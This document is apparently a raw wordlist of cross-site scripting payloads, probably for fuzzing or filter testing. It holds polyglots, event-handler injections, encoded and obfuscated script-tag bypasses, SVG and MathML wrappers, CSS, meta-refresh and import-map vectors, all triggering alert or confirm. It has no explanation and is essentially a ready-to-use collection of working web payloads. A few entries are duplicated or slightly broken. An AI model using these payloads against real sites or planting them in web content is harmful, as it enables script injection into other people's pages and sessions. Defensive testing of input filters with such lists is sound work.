jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
'">`><marquee><img src=x onerror=confirm(1)></marquee>" onfocus=JaVaSCript:alert(1) autofocus
<img src=x onerror=alert('XSS') onerror=alert('XSS') onerror=alert('XSS')>
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src=javascript:alert('XSS')>
<body onload=alert('XSS')>
<input autofocus onfocus=alert('XSS')>
' onmouseover='alert(1)
" onmouseover="alert(1)
' autofocus onfocus='alert(1)
" autofocus onfocus="alert(1)
';alert('XSS');//
";alert('XSS');//
';alert(String.fromCharCode(88,83,83));//
";alert(String.fromCharCode(88,83,83));//
</style><script>alert('XSS')</script>
expression(alert('XSS'))
url(javascript:alert('XSS'))
@import'javascript:alert("XSS")'
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
onload=alert('XSS')
onerror=alert('XSS')
onmouseover=alert('XSS')
onfocus=alert('XSS')
onclick=alert('XSS')
onsubmit=alert('XSS')
onchange=alert('XSS')
onkeydown=alert('XSS')
onkeyup=alert('XSS')
onkeypress=alert('XSS')
<scr<script>ipt>alert('XSS')</script>
<scrİpt>alert('XSS')</scrİpt>
<script>alert('XSS')</script>
<ſcript>alert('XSS')</ſcript>
<script>al\u0065rt('XSS')</script>
<script>al\x65rt('XSS')</script>
<script>eval('\x61\x6c\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29')</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))</script>
<script>window['ale'+'rt']('XSS')</script>
<script>window[/ale/.source+/rt/.source]('XSS')</script>
<script>Function('ale'+'rt(1)')();rlert('XSS')</script>
<script>[].constructor.constructor('alert(1)')();</script>
<script>top[8680439..toString(30)](1)</script>
<script>(alert)(1)</script>
<script>a=alert,a(1)</script>
<script>[alert][0](1)</script>
<script>alert.call(null,1)</script>
<script>alert.apply(null,[1])</script>
<script>setTimeout('alert(1)',0)</script>
<script>setInterval('alert(1)',0)</script>
<script>requestAnimationFrame(alert.bind(null,1))</script>
<script>Promise.resolve().then(function(){alert(1)})</script>
<script>throw onerror=alert,1</script>
<script>with(document)write('<img src=1 onerror=alert(1)>')</script>
<audio src=x onerror=alert(1)>
<video><source onerror="alert(1)">
<input type=image src=x onerror=alert(1)>
<isindex action=javascript:alert(1) type=image>
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">
<applet code="javascript:alert(1)">
<form><button formaction=javascript&colon;alert(1)>CLICKME
<form><input formaction=javascript&colon;alert(1) type=submit value=CLICKME>
<form><textarea formaction=javascript&colon;alert(1)>CLICKME
<form><select formaction=javascript&colon;alert(1)><option>CLICKME
<form><keygen formaction=javascript&colon;alert(1)>
<frameset onload=alert(1)>
<svg/onload=alert(1)>
<svg><script>alert(1)</script></svg>
<svg><script href=data:,alert(1) />
<svg><script xlink:href=data:,alert(1) />
<svg><use xlink:href=data:,<svg id='x' xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'><script>alert(1)</script></svg>#x />
<svg><foreignObject><script>alert(1)</script></foreignObject></svg>
<svg><title><script>alert(1)</script></title></svg>
<svg><desc><script>alert(1)</script></desc></svg>
<svg><metadata><script>alert(1)</script></metadata></svg>
<svg><text><script>alert(1)</script></text></svg>
<svg><textPath><script>alert(1)</script></textPath></svg>
<svg><tspan><script>alert(1)</script></tspan></svg>
<svg><defs><script>alert(1)</script></defs></svg>
<svg><g><script>alert(1)</script></g></svg>
<svg><symbol><script>alert(1)</script></symbol></svg>
<svg><marker><script>alert(1)</script></marker></svg>
<svg><clipPath><script>alert(1)</script></clipPath></svg>
<svg><mask><script>alert(1)</script></mask></svg>
<svg><pattern><script>alert(1)</script></pattern></svg>
<svg><image><script>alert(1)</script></image></svg>
<svg><switch><script>alert(1)</script></switch></svg>
<svg><foreignObject><script>alert(1)</script></foreignObject></svg>
<math><script>alert(1)</script></math>
<math><mtext><script>alert(1)</script></mtext></math>
<math><mi><script>alert(1)</script></mi></math>
<math><mo><script>alert(1)</script></mo></math>
<math><mn><script>alert(1)</script></mn></math>
<math><ms><script>alert(1)</script></ms></math>
<math><mspace><script>alert(1)</script></mspace></math>
<math><mrow><script>alert(1)</script></mrow></math>
<math><mfrac><script>alert(1)</script></mfrac></math>
<math><msqrt><script>alert(1)</script></msqrt></math>
<math><mroot><script>alert(1)</script></mroot></math>
<math><mstyle><script>alert(1)</script></mstyle></math>
<math><merror><script>alert(1)</script></merror></math>
<math><mpadded><script>alert(1)</script></mpadded></math>
<math><mphantom><script>alert(1)</script></mphantom></math>
<math><menclose><script>alert(1)</script></menclose></math>
<math><msub><script>alert(1)</script></msub></math>
<math><msup><script>alert(1)</script></msup></math>
<math><msubsup><script>alert(1)</script></msubsup></math>
<math><munder><script>alert(1)</script></munder></math>
<math><mover><script>alert(1)</script></mover></math>
<math><munderover><script>alert(1)</script></munderover></math>
<math><mmultiscripts><script>alert(1)</script></mmultiscripts></math>
<math><mtable><script>alert(1)</script></mtable></math>
<math><mtr><script>alert(1)</script></mtr></math>
<math><mtd><script>alert(1)</script></mtd></math>
<math><maligngroup><script>alert(1)</script></maligngroup></math>
<math><malignmark><script>alert(1)</script></malignmark></math>
<math><maction><script>alert(1)</script></maction></math>
<script>`${alert(1)}`</script>
<script>alert`1`</script>
<script>eval`alert\x281\x29`</script>
<script>setTimeout`alert\x281\x29`</script>
<script>setInterval`alert\x281\x29`</script>
<script>Function`x${alert(1)}x`</script>
<script>new Function`x${alert(1)}x`</script>
<script>(alert)`1`</script>
<script>(alert).call`${{toString:alert,valueOf:()=>1}}`</script>
<script>alert(RegExp.prototype.test.call(/a/,alert(1)))</script>
<script>Array.prototype.toString.call([alert,1])</script>
<script>String.prototype.replace.call('x',/x/,alert)</script>
<script>Function.prototype.call.call(alert,null,1)</script>
<script>Reflect.apply(alert,null,[1])</script>
<script>Reflect.construct(alert,[1])</script>
<script>fetch('data:application/wasm;base64,AGFzbQEAAAA=').then(r=>r.arrayBuffer()).then(b=>WebAssembly.instantiate(b)).then(m=>alert(1))</script>
<script>navigator.serviceWorker.register('data:text/javascript,alert(1)')</script>
<script type="importmap">{"imports":{"alert":"data:text/javascript,alert(1)"}}</script><script type="module">import"alert"</script>
<style>@import'javascript:alert(1)'</style>
<style>body{background:url('javascript:alert(1)')}</style>
<style>body{-webkit-binding:url('javascript:alert(1)')}</style>
<style>body{behavior:url('javascript:alert(1)')}</style>
<link rel=stylesheet href='javascript:alert(1)'>
<meta http-equiv=refresh content=0;url=javascript:alert(1)>
<meta http-equiv=refresh content=0;url=data:text/html,<script>alert(1)</script>>
<base href='javascript:alert(1)//'><a href=x>click</a>
<base href='data:text/html,<script>alert(1)</script>'><iframe src=x>
<form action='javascript:alert(1)'><input type=submit></form>
<form><button formaction='javascript:alert(1)'>click</button></form>
<div onclick='&#97;lert(1)'>click</div>
<div onclick='\u0061lert(1)'>click</div>
<div onclick='eval("\x61lert(1)")'>click</div>
<div onclick='Function("\x61lert(1)")()'>click</div>
